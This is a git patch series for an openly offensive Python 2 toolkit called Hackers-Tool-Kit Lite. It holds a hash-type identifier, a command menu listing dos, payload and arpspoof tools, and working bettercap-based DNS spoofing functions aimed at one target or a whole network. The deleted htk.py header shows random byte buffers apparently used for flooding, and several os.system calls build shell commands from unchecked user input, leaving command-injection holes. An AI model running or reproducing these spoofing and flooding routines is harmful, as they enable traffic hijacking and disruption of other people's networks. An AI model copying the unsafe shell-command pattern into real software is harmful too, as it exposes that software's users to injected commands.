hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] + except: + print "\n" +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("\033[1mhit enter to stop server:\033[0m ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") + +def terminal(): + os.system("gnome-terminal") + +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + +def main(): + found = False + while not found: + try: + x = raw_input('\033[0mHTK{0}{1}\033[0mLite: '.format(random.choice(colorlist), random.choice(inputlist))) + + if x == "clear": + os.system("clear") + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + + if x == "banner": + mainbanner() + if x == "?": + helpbanner() + if x == "infoscan": + infoscan() + if x == "infoscan -o": + specscan() + if x == "dos": + dos() + if x == "payload": + payload() + if x == "password": + password() + if x == "reboot": + reboot() + if x == "monitor on": + monitoron() + if x == "monitor off": + monitoroff() + if x == "command": + command() + if x == "anon on": + anonon() + if x == "anon off": + anonoff() + if x == "sysinfo": + sysinfo() + if x == "netscan": + netscan() + if x == "verscan": + verscan() + if x == "wordlist": + wordlist() + if x == "arpspoof": + arpspoof() + if x == "traff": + traff() + if x == "hashid": + hashid() + if x == "aserver": + aserver() + if x == "terminal": + terminal() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoof --all": + dnsspoofall() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True +try: + if len(sys.argv) < 2: + starting() + print "{0}Welc{1}ome T{2}o Hacke{3}rs-Too{4}l-Kit{5} Lite\033[0m".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + time.sleep(1.8) + mainbanner() + main() + if sys.argv[1] == "-h": + print """ +-------------------------------------------------------------- +-h : this menu + +--commandsearch : search for specific commands + +--commandinfo : more info about the commands + +--commandcount : see how many commands are available + +--run : run a command in htk-lite from the terminal + +--proxy : run htkl with proxychains + +--quickrun : run htkl without starting menu +-------------------------------------------------------------- + """ + if sys.argv[1] == "--run": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + os.system("python commandlist/{0}.py".format(sys.argv[2])) + main() + if sys.argv[1] == "--commandcount": + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + if b == "1": + print "(\033[32m{0}\033[0m) Command is available".format(b) + else: + print "(\033[32m{0}\033[0m) Commands are available".format(b) + if sys.argv[1] == "--proxy": + os.system("service tor restart") + os.system("proxychains python htkl.py") + + if sys.argv[1] == "--quickrun": + mainbanner() + main() + + if sys.argv[1] == "--commandinfo": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + try: + command = os.popen('cat commandinfo/{0}.txt'.format(sys.argv[2])).read() + print command + except: + print "No command named {0} available".format(command) + + if sys.argv[1] == "--commandsearch": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + command = os.popen('find commandlist -name "*{0}*"'.format(sys.argv[2])).read() + a = command.replace('commandlist/', '') + b = a.replace('.py', '') + c = b.replace('commandlist', '') + + print "Commands Found Matching '{0}':\n".format(sys.argv[2]) + print c +except: + os.system("") From b45755a93d3c0aa2df24baafb38e7ddffbc7f1ac Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 Apr 2020 09:17:47 -0400 Subject: [PATCH 210/214] Delete htk.py --- htk.py | 3298 -------------------------------------------------------- 1 file changed, 3298 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 022dca9..0000000 --- a/htk.py +++ /dev/null @@ -1,3298 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -import readline -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - 